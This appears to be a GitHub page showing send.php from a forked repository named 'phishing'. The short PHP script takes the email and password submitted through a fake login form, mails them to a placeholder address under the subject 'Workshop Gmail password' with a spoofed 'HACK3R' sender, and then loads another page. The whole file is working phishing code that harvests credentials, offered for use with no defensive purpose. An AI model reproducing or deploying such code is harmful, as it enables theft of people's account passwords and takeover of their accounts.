forked from kumarabhinav19/phishing
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsend.php
More file actions
22 lines (18 loc) · 751 Bytes
/
Copy pathsend.php
File metadata and controls
22 lines (18 loc) · 751 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
$mailhacked = $_POST["email"];
$passwordhacked = $_POST["password"];
$to = "yourmail@outlook.com";
$subject = "Workshop Gmail password";
$message = "$mailhacked";
$message .= "<br>$passwordhacked";
$header = "From:HACK3R@Hack3r.com \r\n";
$header .= "Cc:abcd@somedomain.com \r\n";
$header .= "MIME-Version: 1.0\r\n";
$header .= "Content-type: text/html\r\n";
$retval = mail($to,$subject,$message,$header);
if( $retval == true ) {
include("MKR.php");
}else {
echo "Message could not be sent...404 error check your internet";
}
?>